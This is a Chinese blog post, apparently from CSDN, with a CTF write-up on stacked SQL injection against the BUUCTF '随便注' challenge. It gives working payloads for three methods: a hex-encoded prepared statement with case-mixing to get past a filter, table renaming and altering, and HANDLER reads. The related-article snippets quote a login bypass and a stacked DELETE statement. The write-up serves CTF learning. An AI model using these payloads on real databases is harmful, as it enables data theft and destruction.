堆叠注入进阶--(buuctf-随便注、GYCTF-black_list)【多方法详解】

最新推荐文章于 2024-03-05 08:35:15 发布
最新推荐文章于 2024-03-05 08:35:15 发布
阅读量211 收藏
点赞数
分类专栏: buuctf 文章标签: web安全 网络安全 sql sql注入 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bin789456/article/details/121065742
版权

了解一下

堆叠注入基础知识及其他题目:
SQL-堆叠注入

终于有时间来填填坑了

Buuctf-随便注

算是堆叠注入中非常经典的题目了。
在这里插入图片描述
随便试试就能看到黑名单:
在这里插入图片描述
没了select,其实大概率就是堆叠注入
先探测一下:

1';show databases;#

在这里插入图片描述
应该就是了。
再看看表:

1';show tables;#

在这里插入图片描述
然后查看表的结构先找到flag的位置:

1';desc `1919810931114514`;#

注:在mysql中,数字作为名称都要带上`这个符号来使用,用show columns from `1919810931114514`也行,也是记得加上`

找到
在这里插入图片描述

进阶点

这里就是关键,要如何来查看表中内容呢?select肯定是用不了了

方法一:编码处理

编码处理
因为select被过滤了,所以先将select * from `1919810931114514` 进行16进制编码,得到:

73656C656374202A2066726F6D20603139313938313039333131313435313460

本来payload为:

1';set @a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare newsql from @a;execute newsql;#

但是:
在这里插入图片描述
还有一个waf,使用大小写混写绕过

1';Set @a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare newsql from @a;execute newsql;#

得到结果:
在这里插入图片描述

方法二:巧用已知

在使用堆叠注入查看表之后,除了1919810931114514还有一个words表,因为show tables一定是在当前数据库工作的,说明一开始查询 1得到的,

array(2) {
 [0]=>
 string(1) "1"
 [1]=>
 string(7) "hahahah"
}

一定是利用这两个表查询出来的,显然1919810931114514这个表是不可能的,因为它只有一个字段的,不可能出现两个字段的结果。

1919810931114514的desc 结果如下:
在这里插入图片描述
现在我们就已知,查询的表是words表,输入1就会出现id=1的列,输入2就可以查id=2的列。虽然不能自己查询,但是可以默认查询words表的固定内容,尝试将
1919810931114514重命名为words,让查询语句默认可以查询到flag

0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

现在来解释一下payload,首先把原word改名为words1,把1919810931114514改名为words,将表中的flag字段修改为id字段,同时将字段的数据类型设置为可变长度字符串,字符集设置为utf8,排序规则设置为utf8_general_ci,并且该字段不能为空。

最后查询一下words表的内容:

1' or 1=1#

在这里插入图片描述

方法三:handler读取

handler可以优化mysql 性能,但是它本身也存在一些问题。
参考链接:
Handler参考链接1
Handler参考链接2

它具有查询的功能,可以平替select,用法就像这样

handler t_student open as t;handler t read first;

所以它可以直接查询,构造payload就像这样:

1';handler `1919810931114514` open as p;handler p read first;#

在这里插入图片描述

sayo.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Stached injection -- 堆叠注入
RuoLi_s的博客
12-30 216
Stached injection – 堆叠注入 原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14208908.html 0x00 堆叠注入的定义 ​ Stacked injection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询,可以达到修改数据和调用存储过程的目的。 0x01 堆叠注入的原理 ​ 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql
堆叠注入--攻防世界CTF赛题学习
weixin_52515588的博客
03-24 780
发现对关键字都进行了过滤,那么接下来想用常规思路得到数据是不可能了,就利用堆叠注入。可以确定用户输入的内容被带入到数据库中查询了,那么就可以确定这个位置有注入漏洞。在这里大家额外补充一下关于mysql中handler的知识点,我也是现查的。在这发现了flag,这里查询的时候意一下,需要用``把表名括起来。堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。接下来就是手工注入的常见思路,利用order by来猜列。
CTF——sql注入堆叠注入整理
weixin_51735061的博客
03-04 5687
sql注入中的堆叠注入的整理。整理基于“强网杯2019随便
一天一道CTF 第三天(堆叠注入改表名)
scrawman的博客
03-02 422
[强网杯 2019]随便 今天的也是SQL注入,输入1'报错显示说明闭合符号是' 再随便试试-1’ union select 1,2,3 --+,回显return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); preg_match本来的作用是一个匹配函数,也就是在我们输入的语句中查找是否存在select等关键词,i表示大小写不敏感,无法用大小写混搭来绕过。 在网上查了一下可以用堆叠注入,1';show databa
[GYCTF2020]Blacklist堆叠注入
记录学习,一起进步
01-19 1989
[GYCTF2020]Blacklist堆叠注入
bsf.rar_Black-Scholes_black scholes_formula
09-19
在标题"bsf.rar_Black-Scholes_black scholes formula"中,"bsf.rar"可能是包含Black-Scholes公式实现代码或解释的压缩文件,而"Black-Scholes"则是我们关的核心内容,即Black-Scholes模型。"black scholes ...
基于Red-Black小波变换的多光谱图像融合方法
02-24
针对张量积小波在多光谱图像融合中的不足, 提出了一种基于Red-Black小波变换的多光谱图像和高空间分辨率全色 图像融合方法。首先对多光谱图像进行IHS变换, 将得到的亮度分量和高空间分辨率全色图像进行直方图...
black litterman_Black-Litterman_blacklitterman_Black-Litterman-_
09-30
**Black-Litterman模型详解** Black-Litterman模型是由 Fischer Black 和 Robert Litterman 在1992年提出的一种资产配置方法,它结合了投资者的观点(Views)与市场的有效前沿(Efficient Frontier)来改进传统的...
flash_driver_source.rar_Black fin-506 _fin_flash driver DSP
09-14
Black Fin-506 DSP串行Flash驱动程序详解》 在嵌入式系统领域,Black Fin-506 DSP(数字信号处理器)是ADI公司推出的一种高效能、低功耗的处理器,常用于实时信号处理应用。在这样的系统中,Flash存储器扮演着至...
bitnami-docker-blackbox-exporter:用于Blackbox_exporter的Bitnami Docker映像
04-08
$ docker run --name blackbox-exporter bitnami/blackbox-exporter:latest 为什么要使用Bitnami Images? Bitnami密切跟踪上游源代码变化,并使用我们的自动化系统及时发布该图像的新版本。 对于Bitnami映像,将...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
[GYCTF2020]Blacklist 1堆叠注入
weixin_45577185的博客
07-20 137
答案链接 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;# 堆叠注入小tips ...
[SUCTF 2019]EasySQL——堆叠注入
m0_46607055的博客
09-02 250
1、猜测执行语句 sql注入都需要先猜测后端的查询语句,有时候是语句结构,像闭合的字符串,其他的逻辑运算符,有时候是猜测信息,像查询字段、字段数、表名。 拿到题目,可以分类输入字符串,根据回显推测查询语句。 我个人的基本思路是 先 数字,再字母,再拼接特殊符号。 先试试 1, 再 abc,。没回显,放弃字母。 继续尝试特殊字符,1' --> 没有回显 。1" --> 回显nonono1; 回显 array 目前猜测(可能不对,但是先...
2021-07-08 CTFer成长之路-SQL注入-报错注入堆叠注入
热门推荐
时光隧道
07-08 5万+
一:报错注入 报错注入可以获取数据表的账号密码 二:堆叠注入 可以删除数据表的数据 http://192.168.20.133/sql4.php?id=1%27;delete%20%20from%20wp_files;%23
[GYCTF2020]Blacklist堆叠注入
qq_43801002的博客
04-27 3326
[GYCTF2020]Blacklist 1';show columns from `FlagHere`; %23 查看列 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭...
BUUCTF-堆叠注入-文件包含
m0_64180167的博客
03-28 597
提示我们是include 文件包含打开环境点击我们include 尝试直接访问根目录 失败使用伪协议base64解密。
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 608
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。册页面不好使,然后就看WP了 二、 学到的&&am
CTF堆叠注入
最新发布
weixin_48691188的博客
03-05 384
比如phpmysqli_multi_query()函数,这个函数在支持同时执行多条sql语句,而与之对应的mysqli_query()函数一次只能执行一条sql语句,所以要想目标存在堆叠注入,在目标主机没有对堆叠注入进行黑名单过滤的情况下必须存在类似于mysqli_multi_query()这样的函数。插入数据到student表:insert into student(id,name,score) values(1,"toert","100"),(2,"giao","10");
第30天:WEB攻防-通用漏洞&SQL注入&CTF&二次&堆叠&DNS带外
wuqingsix的博客
11-21 412
2、如利用mysql_multi_query()函数就支持多条SQL语句同时执行,实际情况中如PHP的防SQL注入机制,其使用的数据库函数为 "mysqli_query()"函数。主要原因是,堆叠注入的利用看起来很厉害但是其可能会受到 API、数据库引擎或者权限的控制。1、当用户输入恶意数据时,网站对我们输入的重要的关键字进行了转义,然后存储到数据库。数据一定是插入进去的,数据库攻击代码取出来调用 ,当人有执行查询操作时 会被触发。解决不回显,反向连接,SQL注入,命令执行,SSRF等。
BUUCTF SQL注入1
03-29
这是一道基础的 SQL 注入题目,我们需要在登录页面中注入 SQL 语句来绕过验证,成功登录管理员账号。 首先,我们打开登录页面,输入任意用户名和密码,点击登录,可以看到页面返回了一段 SQL 语句: ``` SELECT * FROM users WHERE username = 'xxx' AND password = 'xxx' ``` 这是一个用于登录验证的 SQL 语句,我们可以通过注入来绕过这个验证。 在用户名和密码处尝试注入,输入 `' or 1=1 --`,点击登录,发现页面跳转到了管理员界面,注入成功。 这个注入语句中,`'` 表示闭合了用户名或密码的字符串,`or 1=1` 表示逻辑或,永远为真,`--` 表示 SQL 释,释后面的语句。 因此,注入后的 SQL 语句变为: ``` SELECT * FROM users WHERE username = '' or 1=1 --' AND password = '' or 1=1 --' ``` 其中,`--` 后面的语句被释掉了,因此不会影响 SQL 语句的执行。 最后,我们成功登录了管理员账号,Flag 就在管理员界面上。 意,这里的注入语句是基于题目情况而定的,实际情况可能会有所不同,需要结合实际情况来进行注入。同时,注入操作可能会对系统造成损害,需要谨慎使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值